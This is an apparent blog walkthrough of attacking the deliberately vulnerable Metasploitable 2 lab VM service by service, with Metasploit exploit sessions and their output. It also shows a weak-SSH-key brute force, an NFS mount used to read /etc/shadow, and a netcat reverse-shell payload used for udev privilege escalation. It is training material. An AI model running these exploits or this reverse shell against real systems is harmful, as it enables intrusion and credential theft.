Pentest lab - Metasploitable 2 - Core dump overflow

Today I will walk through different ways of exploiting Metasploitable 2, the newer release of Rapid7’s popular vulnerable machine. First, what is Metasploitable?

Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques.

In my lab environment, the IP of the attacker machine is 192.168.127.159, and the victim machine is 192.168.127.154.

Since this is a test lab, I won’t be concerned about stealth. Instead, I will try to get the most information out of the scans.

Let’s start by port scanning the target with nmap. I did a full port, aggresive scan against the target. Here are the results.

nmap -p1-65535 -A 192.168.127.154

Starting Nmap 6.46 ( http://nmap.org ) at 2014-06-03 21:33 EEST
Nmap scan report for 192.168.127.154
Host is up (0.00047s latency).
Not shown: 65505 closed ports
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45+00:00
|_Not valid after:  2010-04-16T13:07:45+00:00
|_ssl-date: 2014-06-03T18:35:26+00:00; -1s from local time.
53/tcp    open  domain      ISC BIND 9.4.2
| dns-nsid: 
|_  bind.version: 9.4.2
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Metasploitable2 - Linux
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      46385/tcp  mountd
|   100005  1,2,3      47809/udp  mountd
|   100021  1,3,4      47120/udp  nlockmgr
|   100021  1,3,4      53013/tcp  nlockmgr
|   100024  1          34130/tcp  status
|_  100024  1          45305/udp  status
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login?
514/tcp   open  tcpwrapped
1099/tcp  open  java-rmi    Java RMI Registry
1524/tcp  open  shell       Metasploitable root shell
2049/tcp  open  nfs         2-4 (RPC #100003)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      46385/tcp  mountd
|   100005  1,2,3      47809/udp  mountd
|   100021  1,3,4      47120/udp  nlockmgr
|   100021  1,3,4      53013/tcp  nlockmgr
|   100024  1          34130/tcp  status
|_  100024  1          45305/udp  status
2121/tcp  open  ftp         ProFTPD 1.3.1
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: 
|   Protocol: 53
|   Version: .0.51a-3ubuntu5
|   Thread ID: 8
|   Capabilities flags: 43564
|   Some Capabilities: ConnectWithDatabase, SwitchToSSLAfterHandshake, Support41Auth, SupportsTransactions, Speaks41ProtocolNew, SupportsCompression, LongColumnFlag
|   Status: Autocommit
|_  Salt: (eFoz:O^m'yLR5Qw&RJ\
3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp  open  vnc         VNC (protocol 3.3)
| vnc-info: 
|   Protocol version: 3.3
|   Security types: 
|_    Unknown security type (33554432)
6000/tcp  open  X11         (access denied)
6667/tcp  open  irc         Unreal ircd
| irc-info: 
|   server: irc.Metasploitable.LAN
|   version: Unreal3.2.8.1. irc.Metasploitable.LAN 
|   servers: 1
|   users: 1
|   lservers: 0
|   lusers: 1
|   uptime: 0 days, 0:07:28
|   source host: 7FA0EA81.B1DFC955.FFFA6D49.IP
|_  source ident: nmap
6697/tcp  open  irc         Unreal ircd
8009/tcp  open  ajp13?
| ajp-auth: 
|_  ERROR: Failed to connect to AJP server
| ajp-methods: 
|_  ERROR: Failed to connect to server
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
34130/tcp open  status      1 (RPC #100024)
46385/tcp open  mountd      1-3 (RPC #100005)
50867/tcp open  unknown
53013/tcp open  nlockmgr    1-4 (RPC #100021)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      46385/tcp  mountd
|   100005  1,2,3      47809/udp  mountd
|   100021  1,3,4      47120/udp  nlockmgr
|   100021  1,3,4      53013/tcp  nlockmgr
|   100024  1          34130/tcp  status
|_  100024  1          45305/udp  status
MAC Address: 00:0C:29:2E:6D:70 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP
|_  System time: 2014-06-03T14:35:26-04:00

TRACEROUTE
HOP RTT     ADDRESS
1   0.47 ms 192.168.127.154

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 284.64 seconds

Ok, there are plenty of services just waiting for our attention. So let’s check each port and see what we get.

Port 21 vsftpd

There is an exploit available in Metasploit for the vsftpd version.

msf > search vsftpd

Matching Modules
================

   Name                                  Disclosure Date  Rank       Description
   ----                                  ---------------  ----       -----------
   exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution

The description from Rapid7 site:

VSFTPD v2.3.4 Backdoor Command Execution

This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.

Let’s leverage it and get a shell:

msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  21               yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.127.154
RHOST => 192.168.127.154
msf exploit(vsftpd_234_backdoor) > show payloads

Compatible Payloads
===================

   Name               Disclosure Date  Rank    Description
   ----               ---------------  ----    -----------
   cmd/unix/interact                   normal  Unix Command, Interact with Established Connection

msf exploit(vsftpd_234_backdoor) > set payload cmd/unix/interact
payload => cmd/unix/interact
msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.127.154  yes       The target address
   RPORT  21               yes       The target port


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(vsftpd_234_backdoor) > exploit

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.127.159:57936 -> 192.168.127.154:6200) at 2014-06-03 22:42:36 +0300

whoami
root
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Aaand we own the machine! Now let’s move on.

Port 22 ssh

The OpenSSL package installed on the system is vulnerable to a bruteforce exploit due to a random number generator weakness. Here’s the overview and the CVE number:

CVE-2008-0166

OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 on Debian-based operating systems uses a random number generator that generates predictable > numbers, which makes it easier for remote attackers to conduct brute force guessing attacks against cryptographic keys.

I chose the following Ruby exploit:

http://www.exploit-db.com/exploits/5632/

Before running it, you have to download the precalculated vulnerable keys from:

http://www.exploit-db.com/sploits/debian_ssh_dsa_1024_x86.tar.bz2 # for dsa keys

http://www.exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2 # for rsa keys

Then I ran the script as follows:

ruby ./5632.rb 192.168.127.154 root ~/rsa/2048/

You can consult the source for more information, basically this checks if the root account has a weak SSH key, testing each key in the directory where you placed the keys. Upon a hit, you will see something like this:

KEYFILE FOUND:

57c3115d77c56390332dc5c49978627a-5429

After finding the key, you can use it to log in as root via ssh:

ssh -l root -p 22 -i 57c3115d77c56390332dc5c49978627a-5429 192.168.127.154

Port 23 telnet

For this one I used an auxiliary module:

msf > use auxiliary/scanner/telnet/telnet_version
msf auxiliary(telnet_version) > show options

Module options (auxiliary/scanner/telnet/telnet_version):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   RHOSTS                     yes       The target address range or CIDR identifier
   RPORT     23               yes       The target port
   THREADS   1                yes       The number of concurrent threads
   TIMEOUT   30               yes       Timeout for the Telnet probe
   USERNAME                   no        The username to authenticate as

msf auxiliary(telnet_version) > set RHOSTS 192.168.127.154
RHOSTS => 192.168.127.154
msf auxiliary(telnet_version) > run

[*] 192.168.127.154:23 TELNET _                  _       _ _        _     _      ____  \x0a _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ \x0a| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |\x0a| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ \x0a|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|\x0a                            |_|                                          \x0a\x0a\x0aWarning: Never expose this VM to an untrusted network!\x0a\x0aContact: msfdev[at]metasploit.com\x0a\x0aLogin with msfadmin/msfadmin to get started\x0a\x0a\x0ametasploitable login:
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

So now we know the credentials for the msfadmin account, and if you log in and play around you will find out that this accound has sudo privilege, so it’s possible to run commands as root.

Port 80 apache

Navigating to the root of the web server, we can see some vulnerable web applications, along with the msfadmin account details which we got earlier with telnet. I won’t go over the web applications here, because I am focusing on host based exploitation in this post. However, I found out that I could use Metasploit against one of them to get a shell, so I will detail that here.

The Nessus scan revealed that the TWiki web application is vulnerable to remote code execution. I found the following suitable exploit:

TWiki History TWikiUsers rev Parameter Command Execution

This module exploits a vulnerability in the history component of TWiki. By passing a ‘rev’ parameter containing shell metacharacters to the TWikiUsers script, an attacker can execute arbitrary OS commands.

msf > use exploit/unix/webapp/twiki_history
msf exploit(twiki_history) > show options

Module options (exploit/unix/webapp/twiki_history):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        Use a proxy chain
   RHOST                     yes       The target address
   RPORT    80               yes       The target port
   URI      /twiki/bin       yes       TWiki bin directory path
   VHOST                     no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(twiki_history) > set RHOST 192.168.127.154
RHOST => 192.168.127.154
msf exploit(twiki_history) > set payload cmd/unix/reverse 
payload => cmd/unix/reverse
msf exploit(twiki_history) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ZeiYbclsufvu4LGM;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Successfully sent exploit request
[*] Reading from socket B
[*] B: "ZeiYbclsufvu4LGM\r\n"
[*] Matching...
[*] A is input...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo D0Yvs2n6TnTUDmPF;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Command shell session 2 opened (192.168.127.159:4444 -> 192.168.127.154:54381) at 2014-06-08 17:31:48 +0300
[*] Reading from socket B
[*] B: "D0Yvs2n6TnTUDmPF\r\n"
[*] Matching...
[*] A is input...

whoami
www-data

This is a low privilege shell, but we can escalate to root via the udev exploit, as shown later.

Port 445 samba

First, I’ll use an auxiliary module to get the server’s version:

msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target address range or CIDR identifier
   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads

msf auxiliary(smb_version) > set RHOSTS 192.168.127.154
RHOSTS => 192.168.127.154
msf auxiliary(smb_version) > run

[*] 192.168.127.154:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

With that information in hand, we can now use a suitable exploit against the target:

Samba “username map script” Command Execution

This module exploits a command execution vulerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default “username map script” configuration option. By specifying a username containing shell meta characters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication!

msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(usermap_script) > set RHOST 192.168.127.154
RHOST => 192.168.127.154
msf exploit(usermap_script) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.127.154  yes       The target address
   RPORT  139              yes       The target port


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(usermap_script) > set LHOST 192.168.127.159
LHOST => 192.168.127.159
msf exploit(usermap_script) > set RPORT 445
RPORT => 445
msf exploit(usermap_script) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo f8rjvIDZRdKBtu0F;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "f8rjvIDZRdKBtu0F\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.127.159:4444 -> 192.168.127.154:46653) at 2014-06-04 22:23:23 +0300

whoami
root

Port 514 tcpwrapped

The nmap scan revealed the port is open but it’s tcpwrapped. Let’s first see what that means:

TCP Wrapper is a host-based networking access control list system, used to filter network access to Internet Protocol servers on (Unix- like) operating systems such as Linux or BSD. (Wikipedia)

So we can conclude the port is protected by TCP Wrapper. If we try to netcat to the port, we see this:

nc -vvn 192.168.127.154 514

(UNKNOWN) [192.168.127.154] 514 (shell) open

I ran a Nessus scan against the target, and according to the report, a critical vulnerability is present on this port:

rsh Unauthenticated Access (via finger Information)

Synopsis

It was possible to log on this machine without password.

Description

Using common usernames as well as the usernames reported by ‘finger’, Nessus was able to log in through rsh. Either the accounts are not protected by passwords or the ~/.rhosts files are not configured properly.

This vulnerability is confirmed to exist in Cisco Prime LAN Management Solution, but could be present on any host that is not securely configured.

Port
tcp/514

So all we have to do is log in via the remote shell program:

rsh 192.168.127.154

Last login: Wed May  7 11:00:37 EDT 2014 from :0.0 on pts/0

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;

the exact distribution terms for each program are described in the

individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by

applicable law.

To access official Ubuntu documentation, please visit:

http://help.ubuntu.com/

You have mail.

root@metasploitable:~#

Port 1099 java-rmi

Let’s continue our exploitation. Anything labeled Java is bound to be interesting from a security perspective :)

Searching for Java exploits yielded something interesting:

Java RMI Server Insecure Default Configuration Java Code Execution

This module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it invokes a method in the RMI Distributed Garbage Collector which is available via every RMI endpoint, it can be used against both rmiregistry and rmid, and against most other (custom) RMI endpoints as well. Note that it does not work against Java Management Extension (JMX) ports since those do not support remote class loading, unless another RMI endpoint is active in the same Java process. RMI method calls do not support or require any sort of authentication.

msf > use exploit/multi/misc/java_rmi_server  
msf exploit(java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    1099             yes       The target port
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)

msf exploit(java_rmi_server) > set RHOST 192.168.127.154
RHOST => 192.168.127.154

msf exploit(java_rmi_server) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.127.154  yes       The target address
   RPORT    1099             yes       The target port
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)


msf exploit(java_rmi_server) > set LHOST 192.168.127.159
LHOST => 192.168.127.159
msf exploit(java_rmi_server) > exploit

[*] Started reverse handler on 192.168.127.159:4444 
[*] Using URL: http://0.0.0.0:8080/oVUJAkfU
[*]  Local IP: http://192.168.127.159:8080/oVUJAkfU
[*] Connected and sending request for http://192.168.127.159:8080/oVUJAkfU/WAHKp.jar
[*] 192.168.127.154  java_rmi_server - Replied to request for payload JAR
[*] Sending stage (30355 bytes) to 192.168.127.154
[*] Meterpreter session 2 opened (192.168.127.159:4444 -> 192.168.127.154:36965) at 2014-06-04 22:42:17 +0300
[+] Target 192.168.127.154:1099 may be exploitable...
[*] Server stopped.

meterpreter > getuid
Server username: root
meterpreter > 

Port 1524 shell

Well, not much to say here. There’s already a nice, cozy shell waiting for connections, so nothing extra needs to be done.

Port 2049 nfs

Let’s use the the showmount command to see the NFS server’s export list. This command displays mount information for an NFS server. The -e flag is for showing exports:

showmount -e 192.168.127.154

Export list for 192.168.127.154:

/ *

How nice! The root directory is shared. So, let’s mount it then:

mkdir /metafs # this will be the mount point

mount -t nfs 192.168.127.154:/ /metafs -o nolock # mount the remote shared directory as nfs and disable file locking

Now we can read the passwords and everything else:

cat /metafs/etc/shadow

root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::

..........etc..........

Port 3306 mysql

The Nessus scan that I ran against the target revealed the following:

MySQL Unpassworded Account Check

Synopsis

The remote database server can be accessed without a password.

Description

It is possible to connect to the remote MySQL database server using an unpassworded account. This may allow an attacker to launch further attacks against the database.

The ‘root’ account does not have a password. Here is the list of databases on the remote server : – information_schema – dvwa – metasploit – mysql – owasp10 – tikiwiki – tikiwiki195

Let’s see if we can indeed connect to the database as root without a password:

mysql -u root -p -h 192.168.127.154
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 7
Server version: 5.0.51a-3ubuntu5 (Ubuntu)

Copyright (c) 2000, 2014, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> 

Now we can look inside the databases and get any data that might interest us.

Port 3632 distccd

distccd is the server for the distcc distributed compiler. It accepts and runs compilation jobs for network clients. Metasploit has an exploit avaiable for this:

DistCC Daemon Command Execution

This module uses a documented security weakness to execute arbitrary commands on any system running distccd.

msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > show options

Module options (exploit/unix/misc/distcc_exec):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  3632             yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf exploit(distcc_exec) > set RHOST 192.168.127.154
RHOST => 192.168.127.154
msf exploit(distcc_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(distcc_exec) > show options

Module options (exploit/unix/misc/distcc_exec):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.127.154  yes       The target address
   RPORT  3632             yes       The target port


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf exploit(distcc_exec) > set LHOST 192.168.127.159
LHOST => 192.168.127.159
msf exploit(distcc_exec) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo VhuwDGXAoBmUMNcg;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "VhuwDGXAoBmUMNcg\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.127.159:4444 -> 192.168.127.154:52283) at 2014-06-05 21:34:46 +0300

whoami
daemon

So we have a low privilege account. Time for some local privilege escalation. I will use this exploit: http://www.exploit-db.com/exploits/8572/

Description

udev before 1.4.1 does not verify whether a NETLINK message originates from kernel space, which allows local users to gain privileges by sending a NETLINK message from user space.

Usage

Pass the PID of the udevd netlink socket (listed in /proc/net/netlink, usually is the udevd PID minus 1) as argv[1].

The exploit will execute /tmp/run as root so throw whatever payload you want in there.

Ok, on the command line on the victim, I looked for netcat and fortunately, it’s installed:

whereis nc
nc: /bin/nc.traditional /bin/nc /usr/share/man/man1/nc.1.gz

So I will compile the exploit and send it over netcat. I am on a 64 bit Kali and the target is 32 bit, so I compile it explicitly for 32 bit:

gcc -m32 8572.c -o 8572
nc -vv -l -p 5555 < 8572

From the victim, I go to the /tmp/ directory and grab the exploit from the attacking machine:

nc -v -n 192.168.127.159 5555 > 8572

Next, let’s look for the PID:

cat /proc/net/netlink

And the relevant line is:

sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
df8cc200 15  2767   00000001 0        0        00000000 2

Check that this is the correct PID by looking at the udev service:

ps aux | grep udev
root      2768  0.0  0.1   2092   620 ?        S<s  14:11   0:00 /sbin/udevd --daemon

It appears to be the right one (2768 – 1 = 2767)

Next, put some payload in /tmp/run, since that will be executed by the exploit. I will use netcat to connect to the atacker machine and give it a shell:

echo '#!/bin/bash' > /tmp/run
echo 'nc -e /bin/bash 192.168.127.159 5555' >> /tmp/run

On the attacker machine, listen on port 5555:

nc -v -l -p 5555

And on the victim machine, now that all is set up, I just make the exploit executable and run it:

chmod +x 8572
./8572 2767

Now check our local netcat listener for the root shell:

nc: connect to 192.168.127.159 5555 from 192.168.127.154 (192.168.127.154) 35539 [35539]
whoami
root

A bit on effort on that one, but all the more rewarding! Let’s move on.

Port 5432 postgresql

Since I already saw earlier that the mysql database wasn’t password protected, I will try a bruteforce auxiliary module to see if I can get in this one.

PostgreSQL Login Utility

This module attempts to authenticate against a PostgreSQL instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.

msf > use auxiliary/scanner/postgres/postgres_login
msf auxiliary(postgres_login) > show options

Module options (auxiliary/scanner/postgres/postgres_login):

   Name              Current Setting                                                             Required  Description
   ----              ---------------                                                             --------  -----------
   BLANK_PASSWORDS   false                                                                       no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                           yes       How fast to bruteforce, from 0 to 5
   DATABASE          template1                                                                   yes       The database to authenticate against
   DB_ALL_CREDS      false                                                                       no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                       no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                       no        Add all users in the current database to the list
   PASSWORD                                                                                      no        A specific password to authenticate with
   PASS_FILE         /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_pass.txt      no        File containing passwords, one per line
   RETURN_ROWSET     true                                                                        no        Set to true to see query result sets
   RHOSTS                                                                                        yes       The target address range or CIDR identifier
   RPORT             5432                                                                        yes       The target port
   STOP_ON_SUCCESS   false                                                                       yes       Stop guessing when a credential works for a host
   THREADS           1                                                                           yes       The number of concurrent threads
   USERNAME          postgres                                                                    no        A specific username to authenticate as
   USERPASS_FILE     /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_userpass.txt  no        File containing (space-seperated) users and passwords, one pair per line
   USER_AS_PASS      false                                                                       no        Try the username as the password for all users
   USER_FILE         /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_user.txt      no        File containing users, one per line
   VERBOSE           true                                                                        yes       Whether to print output for all attempts


msf auxiliary(postgres_login) > set RHOSTS 192.168.127.154
RHOSTS => 192.168.127.154
msf auxiliary(postgres_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf auxiliary(postgres_login) > run

[*] 192.168.127.154:5432 Postgres - [01/20] - Trying username:'postgres' with password:'postgres' on database 'template1'
[+] 192.168.127.154:5432 Postgres - Logged in to 'template1' with 'postgres':'postgres'
[+] 192.168.127.154:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.)
[*] 192.168.127.154:5432 Postgres - Disconnected
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

So it’s possible to log in to this database like earlier with mysql, but I searched through Metasploit’s available exploits, and I stumbled upon one that can further the exploitation:

PostgreSQL for Linux Payload Execution

On some default Linux installations of PostgreSQL, the postgres service account may write to the /tmp directory, and may source UDF Shared Libraries’s om there as well, allowing execution of arbitrary code. This module compiles a Linux shared object file, uploads it to the target host via the UPDATE pg_largeobject method of binary injection, and creates a UDF (user defined function) from that shared object. Because the payload is run as the shared object’s constructor, it does not need to conform to specific Postgres API versions.

msf > use exploit/linux/postgres/postgres_payload
msf exploit(postgres_payload) > show options

Module options (exploit/linux/postgres/postgres_payload):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DATABASE  template1        yes       The database to authenticate against
   PASSWORD                   no        The password for the specified username. Leave blank for a random password.
   RHOST                      yes       The target address
   RPORT     5432             yes       The target port
   USERNAME  postgres         yes       The username to authenticate as
   VERBOSE   false            no        Enable verbose output


Exploit target:

   Id  Name
   --  ----
   0   Linux x86

msf exploit(postgres_payload) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(postgres_payload) > set LHOST 192.168.127.159
LHOST => 192.168.127.159
set PASSWORD postgres
PASSWORD => postgres
msf exploit(postgres_payload) > exploit

[*] Started reverse handler on 192.168.127.159:4444 
[*] 192.168.127.154:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/uVhDfWDg.so, should be cleaned up automatically
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1228800 bytes) to 192.168.127.154
[*] Meterpreter session 1 opened (192.168.127.159:4444 -> 192.168.127.154:37141) at 2014-06-06 22:49:17 +0300

From here we again have to elevate our privileges. I will exploit the same vulnerability with the udev exploit, but this time from inside Metasploit:

meterpreter > background
[*] Backgrounding session 1...
msf exploit(postgres_payload) > use exploit/linux/local/udev_netlink
msf exploit(udev_netlink) > show options

Module options (exploit/linux/local/udev_netlink):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   NetlinkPID                    no        Usually udevd pid-1.  Meterpreter sessions will autodetect
   SESSION                       yes       The session to run this module on.
   WritableDir  /tmp             yes       A directory where we can write files (must not be mounted noexec)


Exploit target:

   Id  Name
   --  ----
   0   Linux x86


msf exploit(udev_netlink) > set SESSION 1
SESSION => 1
msf exploit(udev_netlink) > exploit

[*] Started reverse handler on 192.168.127.159:4444 
[*] Attempting to autodetect netlink pid...
